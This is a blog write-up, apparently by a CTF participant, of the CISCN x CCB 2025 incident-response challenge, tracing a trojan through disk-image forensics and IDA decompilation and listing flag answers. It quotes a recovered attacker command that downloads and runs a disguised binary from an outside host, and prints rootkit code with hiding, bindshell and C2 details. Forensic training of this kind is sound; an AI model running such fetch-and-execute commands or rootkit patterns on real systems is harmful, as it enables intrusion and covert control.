<!DOCTYPE html>
<html lang="en">

<head>
  <!-- Website mata -->
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<!-- Disable transformation -->
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<!-- Website description -->

<meta name="description" content="CISCN x CCB 半决赛 2025 ISW(应急响应)" />


<!-- Website keywords -->

<meta name="keywords" content="ISW, 应急响应, 取证, NshIdE&#39;s blog" />




<!-- Website rss -->

<link rel="alternate" href="/default" title="NshIdE's blog" >


<!-- Website favicon -->

<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=3.0.0" />


<!-- Canonical, good for google search engine -->
<link rel="canonical" href="https://NshIdE1.github.io/2025/03/18/CISCN x CCB 半决赛 2025 ISW(应急响应)/" />

<!-- Fancybox styling -->

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />


<!-- MathJax (LaTeX) support -->


<!-- Theme styling -->
<link rel="stylesheet" type="text/css" href="/css/style.css?v=3.0.0" />

<!-- Analytics and push -->



  



<!-- LeanCloud Counter -->


<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null,"server_url":null,"cdn":null},"toc":true,"fancybox":true,"latex":false};
</script>
  
  <title>CISCN x CCB 半决赛 2025 ISW(应急响应) - NshIdE&#39;s blog</title>

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div class="scrollPercentage"></div>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">NshIdE&#39;s blog</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
    <a href="/">
      <li class="mobile-menu-item">
        
        
        Home              </li>
    </a>
    
    <a href="/archives/">
      <li class="mobile-menu-item">
        
        
        Archives              </li>
    </a>
    
    <a href="/tags/">
      <li class="mobile-menu-item">
        
        
        Tags              </li>
    </a>
    
    <a href="/categories/">
      <li class="mobile-menu-item">
        
        
        Categories              </li>
    </a>
    
    <a href="/about/">
      <li class="mobile-menu-item">
        
        
        About              </li>
    </a>
    
  </ul>
</nav>
  <div class="container" id="mobile-panel">
    <header id="header" class="header">
      <div class="logo-wrapper">  
  <a href="/." class="logo">NshIdE's blog</a>  
</div>  
  
<nav class="site-navbar">  
    
    <ul id="menu" class="menu">  
        
        <li class="menu-item">  
          <a class="menu-item-link" href="/">  
              
              
              Home  
              
          </a>  
        </li>  
        
        <li class="menu-item">  
          <a class="menu-item-link" href="/archives/">  
              
              
              Archives  
              
          </a>  
        </li>  
        
        <li class="menu-item">  
          <a class="menu-item-link" href="/tags/">  
              
              
              Tags  
              
          </a>  
        </li>  
        
        <li class="menu-item">  
          <a class="menu-item-link" href="/categories/">  
              
              
              Categories  
              
          </a>  
        </li>  
        
        <li class="menu-item">  
          <a class="menu-item-link" href="/about/">  
              
              
              About  
              
          </a>  
        </li>  
        
    </ul>  
    
</nav>  

    </header>
    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
  <header class="post-header">
    <h1 class="post-title">
      
      CISCN x CCB 半决赛 2025 ISW(应急响应)
      
    </h1>

    <div class="post-meta">
      <span class="post-time">
        2025-03-18
      </span>
      
      
      <span class="post-category">
        
        <a href="/categories/CISCN-x-CCB-%E5%8D%8A%E5%86%B3%E8%B5%9B-2025-ISW-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">CISCN x CCB 半决赛 2025 ISW(应急响应)</a>
        
      </span>
      
      
    </div>
  </header>

  
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CISCN-x-CCB-%E5%8D%8A%E5%86%B3%E8%B5%9B-2025-ISW-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94"><span class="toc-number">1.</span> <span class="toc-text">CISCN x CCB 半决赛 2025 ISW(应急响应)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%83%8C%E6%99%AF"><span class="toc-number">1.0.1.</span> <span class="toc-text">题目背景</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag1"><span class="toc-number">1.0.2.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag2"><span class="toc-number">1.0.3.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag3"><span class="toc-number">1.0.4.</span> <span class="toc-text">flag3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag4"><span class="toc-number">1.0.5.</span> <span class="toc-text">flag4</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag5"><span class="toc-number">1.0.6.</span> <span class="toc-text">flag5</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag6"><span class="toc-number">1.0.7.</span> <span class="toc-text">flag6</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag7"><span class="toc-number">1.0.8.</span> <span class="toc-text">flag7</span></a></li></ol></li></ol></li></ol>
    </div>
  </div>
  

  <div class="post-content">
    
    <h1 id="CISCN-x-CCB-半决赛-2025-ISW-应急响应"><a href="#CISCN-x-CCB-半决赛-2025-ISW-应急响应" class="headerlink" title="CISCN x CCB 半决赛 2025 ISW(应急响应)"></a>CISCN x CCB 半决赛 2025 ISW(应急响应)</h1><p>第一次入围CISCN半决赛，学了一周应急匆忙上阵，上午awdp坐牢四小时，下午应急也坐牢四小时，狠狠爆零，log目录翻烂了都没找到IP，还得练。</p>
<p>不知道附件中的入口主机dd镜像.raw有啥用，赛后看了其他队伍的wp才知道可以根据这玩意进行恢复取证分析。</p>
<h3 id="题目背景"><a href="#题目背景" class="headerlink" title="题目背景"></a>题目背景</h3><blockquote>
<p>⼩路是⼀名⽹络安全⽹管，据反映发现公司主机上有异常外联信息，据回忆前段时间执⾏过 某些更新脚本（已删除），现在需要协助⼩路同学进⾏⽹络安全应急响应分析，查找⽊⻢， 进⼀步分析，寻找攻击源头，获取攻击者主机权限获取flag⽂件。</p>
</blockquote>
<h3 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h3><blockquote>
<p>题目描述</p>
<p>找出主机上**⽊⻢回连**的主控端服务器IP地址（不定时(3~5分钟)周期性），并以 <strong>flag{MD5}</strong>  形式提交，其中MD5加密⽬标的原始字符串格式 <strong>IP:port</strong></p>
</blockquote>
<p>使用取证工具：<strong>RStudioPortable</strong></p>
<p>工具打开之后，扫描文件所在盘，扫描完成之后，可以看到</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318095417900.png" alt="image-20250318095417900"></p>
<p>其中Recognized就是工具扫描识别出的分区，找到对应的分区，看到</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318095519119.png" alt="image-20250318095519119"></p>
<p>首先查看靶机给的Ubuntu用户，raw目录</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318095712206.png" alt="image-20250318095712206"></p>
<p>发现一个可疑且被删除的文件，<strong>1.txt</strong>，恢复提取查看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade &amp;&amp; </span><br><span class="line">chmod +x /tmp/.system_upgrade &amp;&amp; /tmp/.system_upgrade</span><br></pre></td></tr></table></figure>

<p>有可能时黑客下载病毒文件时所执行的命令，同时在本目录还看到可疑文件**.viminfo**</p>
<blockquote>
<p><strong>Viminfo</strong>⽂件是Vim编辑器中的⼀个重要⽂件，⽤于保存⽤⼾在退出Vim时的各种状态信 息，以便在⽤⼾再次启动Vim时能够快速恢复这些状态</p>
</blockquote>
<p>恢复提取查看</p>
<p>在其中看到了和下载的文件名相同的服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"># Jumplist (newest first):</span><br><span class="line">-&#x27;  6  0  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,6,0,1740374317,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  6  0  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,6,0,1740374161,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  5  7  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,5,7,1740374156,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  5  7  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,5,7,1740374156,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  5  7  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,5,7,1740374151,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  1  0  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,1,0,1740374113,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  1  0  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,1,0,1740374113,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br><span class="line">-&#x27;  1  0  /etc/systemd/system/system-upgrade.service</span><br><span class="line">|4,39,1,0,1740374113,&quot;/etc/systemd/system/system-upgrade.service&quot;</span><br></pre></td></tr></table></figure>

<p>找到该服务</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318100355212.png" alt="image-20250318100355212"></p>
<p>右键预览</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318100428169.png" alt="image-20250318100428169"></p>
<p>可以看到该服务所启动的程序，找到恢复提取，然后用ida反编译</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318100600123.png" alt="image-20250318100600123"></p>
<p>发现对符号表进行了混淆</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318100700135.png" alt="image-20250318100700135"></p>
<p>但依旧可以通过字符串找到主函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">ULRYvXzICzy880dO</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  _fentry__();</span><br><span class="line">  Cr8YeLCPy17g2Kqp();</span><br><span class="line">  vH5iRF4rBcsPSxfk();</span><br><span class="line">  QODpPLbPPLRtk397();</span><br><span class="line">  ZRzAVZZOp3EIPba6(&amp;unk_2720);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;HIDEME&quot;</span>, ZRzAVZZOp3EIPba6);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;SHOWME&quot;</span>, bbiVzCN8llELLp6o);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;HIDE_DENT&quot;</span>, Fmk3MFLuFCEiNxgN);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;SHOW_HIDDEN_DENT&quot;</span>, PiCa2rGqFOVs1eiB);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;HIDE_TCP_PORT&quot;</span>, IDZO4NzptW8GaHzj);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;SHOW_HIDDEN_TCP_PORT&quot;</span>, ol186ifyeUPhXKNl);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;HIDE_TCP_IP&quot;</span>, H7XMCPIhJup38DuP);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;SHOW_HIDDEN_TCP_IP&quot;</span>, yiA2lg0kW8v2vOp0);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;HIDE_UDP_PORT&quot;</span>, cuC5zWc4iL4kPgAn);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;SHOW_HIDDEN_UDP_PORT&quot;</span>, LC22j9OZfANw81M7);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;HIDE_UDP_IP&quot;</span>, YlfqRhWLKVqMFbxN);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;SHOW_HIDDEN_UDP_IP&quot;</span>, XBKrkXaghfenXrk6);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;BINDSHELL_CREATE&quot;</span>, NVEKPqx35kIvfacV);</span><br><span class="line">  XnzbhEaPnydxn1rY(<span class="string">&quot;RUN_CUSTOM_BASH&quot;</span>, T34Z94ahif0BXQRk);</span><br><span class="line">  Fmk3MFLuFCEiNxgN(<span class="string">&quot;systemd-agentd&quot;</span>);</span><br><span class="line">  Fmk3MFLuFCEiNxgN(<span class="string">&quot;system-upgrade&quot;</span>);</span><br><span class="line">  Fmk3MFLuFCEiNxgN(<span class="string">&quot;system_upgrade&quot;</span>);</span><br><span class="line">  IDZO4NzptW8GaHzj(<span class="string">&quot;4948&quot;</span>);</span><br><span class="line">  IDZO4NzptW8GaHzj(<span class="string">&quot;1337&quot;</span>);</span><br><span class="line">  H7XMCPIhJup38DuP(<span class="string">&quot;192.168.57.203&quot;</span>);</span><br><span class="line">  H7XMCPIhJup38DuP(<span class="string">&quot;127.0.0.1&quot;</span>);</span><br><span class="line">  cuC5zWc4iL4kPgAn(<span class="string">&quot;8080&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> YlfqRhWLKVqMFbxN(<span class="string">&quot;127.0.0.1&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>找到了IP和port</p>
<p><strong>flag{MD5(192.168.57.203:4948)}</strong></p>
<hr>
<h3 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h3><blockquote>
<p>找出主机上驻留的<strong>远控⽊⻢⽂件本体</strong>，计算该⽂件的MD5,结果提交形式： flag{md5}</p>
</blockquote>
<p>在第一题中ida反编译的结果中就可以找到木马本体</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318101029728.png" alt="image-20250318101029728"></p>
<p>导出计算文件md5即可</p>
<p><strong>flag{bccad26b665ca175cd02aca2903d8b1e}</strong></p>
<hr>
<h3 id="flag3"><a href="#flag3" class="headerlink" title="flag3"></a>flag3</h3><blockquote>
<p>找出主机上加载远控⽊⻢的<strong>持久化程序</strong>（下载者），其功能为下载并执⾏远控⽊⻢，计算该 ⽂件的MD5,结果提交形式： flag{MD5}</p>
</blockquote>
<p>这个持久化程序就是我们之前找到的那个服务</p>
<p><strong>flag{fabe3a89369c56609d2748e5890b21d7}</strong></p>
<hr>
<h3 id="flag4"><a href="#flag4" class="headerlink" title="flag4"></a>flag4</h3><blockquote>
<p>查找题⽬3中持久化程序（下载者）的<strong>植⼊痕迹</strong>，计算持久化程序植⼊时的原始名称MD5 （仅计算⽂件名称字符串MD5），并提交对应 flag{MD5}</p>
</blockquote>
<p>持久化程序的植入痕迹也就是我们在最开始的1.txt中看到的下载指令中的<strong>system_upgrade</strong></p>
<p><strong>flag{MD(system_upgrade)}</strong></p>
<hr>
<h3 id="flag5"><a href="#flag5" class="headerlink" title="flag5"></a>flag5</h3><blockquote>
<p>分析题⽬2中找到的远控⽊⻢，获取⽊⻢通信加密密钥,结果提交形式：flag{ 通信加密 钥 } </p>
</blockquote>
<p>将题目2中得到的文件用ida分析，很显然去符号了，但是依旧可以通过可疑的数组进行定位(这对逆向手不是一眼盯真)</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318102105359.png" alt="image-20250318102105359"></p>
<p>交叉引用找到引用函数</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318102141618.png" alt="image-20250318102141618"></p>
<p>就是一个异或</p>
<p><img src="https://nshide.oss-cn-hangzhou.aliyuncs.com/img_temp/image-20250318102231539.png" alt="image-20250318102231539"></p>
<p><strong>flag{ThIS_1S_th3_S3cR3t_fl@g}</strong></p>
<hr>
<h3 id="flag6"><a href="#flag6" class="headerlink" title="flag6"></a>flag6</h3><blockquote>
<p>分析题⽬3中持久化程序（下载者），找到攻击者分发远控⽊⻢使⽤的服务器，并获取该服 务器权限，找到flag，结果提交形式： flag{xxxx} </p>
</blockquote>
<p>未能复现，只能等后期看会不会在一些靶场重新上线吧</p>
<hr>
<h3 id="flag7"><a href="#flag7" class="headerlink" title="flag7"></a>flag7</h3><blockquote>
<p>获取题⽬2中找到的远控⽊⻢的主控端服务器权限，查找flag⽂件，结果提交形式： flag{xxxxx}</p>
</blockquote>
<p>同上</p>

    
  </div>

  
  <!-- Post Copyright -->

<div class="post-copyright">
  <p class="copyright-item">
    <span>Author: </span>
    <a href="https://NshIdE1.github.io">NshIdE</a>
  </p>
  <p class="copyright-item">
    <span>Link: </span>
    <a href="https://nshide1.github.io/2025/03/18/CISCN%20x%20CCB%20%E5%8D%8A%E5%86%B3%E8%B5%9B%202025%20ISW(%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94)/">https://nshide1.github.io/2025/03/18/CISCN%20x%20CCB%20%E5%8D%8A%E5%86%B3%E8%B5%9B%202025%20ISW(%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94)/</a>
  </p>
  <p class="copyright-item">
    <span>License: </span>
    
    <a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
  </p>
</div>

    

  

  
  <footer class="post-footer">
    
    <div class="post-tags">
      
      <a href="/tags/ISW/">ISW</a>
      
      <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">应急响应</a>
      
      <a href="/tags/%E5%8F%96%E8%AF%81/">取证</a>
      
    </div>
    
      
  <nav class="post-nav">  
      
      <a class="prev" href="/2025/03/23/NCTF2024/">  
        <i class="iconfont icon-left"></i>  
        <span class="prev-text nav-default">NCTF2024</span>  
        <span class="prev-text nav-mobile">Prev</span>  
      </a>  
      
      
      <a class="next" href="/2025/03/11/TPCTF%202025/">  
        <span class="next-text nav-default">TPCTF 2025</span>  
        <span class="prev-text nav-mobile">Next</span>  
        <i class="iconfont icon-right"></i>  
      </a>  
      
  </nav>  
  

  </footer>
  

</article>
        </div>
          
  <div class="comments" id="comments">  
      
  </div>  
  

      </div>
    </main>
    <footer id="footer" class="footer">
      <!-- Social Links -->

<div class="social-links">
  
  
  
  
  <a href="mailto:1621925986@qq.com" class="iconfont icon-email" title="email"></a>
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  <a target="_blank" rel="noopener" href="https://github.com/ahonn" class="iconfont icon-github" title="github"></a>
  
  
  
  
  
  
  <a target="_blank" rel="noopener" href="https://www.zhihu.com/" class="iconfont icon-weibo" title="weibo"></a>
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  

  
  
  <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
  
</div>



<div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme -
    <a class="theme-link" target="_blank" rel="noopener" href="https://github.com/zeed-w-beez/hexo-theme-even">Even</a>
  </span>
  <span class="division">|</span>
  <span class="hosting-info">
    footer.hosting
  </span>

  <span class="copyright-year">
    <span>
      
      &copy;
      
      2025      
    </span>

    <span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>

    <span class="author">NshIdE</span>
  </span>

</div>
    </footer>
    <div class="back-to-top" id="back-to-top"> <i class="iconfont icon-up"></i> </div>
  </div>
    
    
    
    
    
    
    
  

  







<script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>



<script type="text/javascript" src="/lib/slideout/slideout.js"></script>



<script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>



  <script type="text/javascript" src="/js/src/even.js?v=3.0.0"></script>
</body>

</html>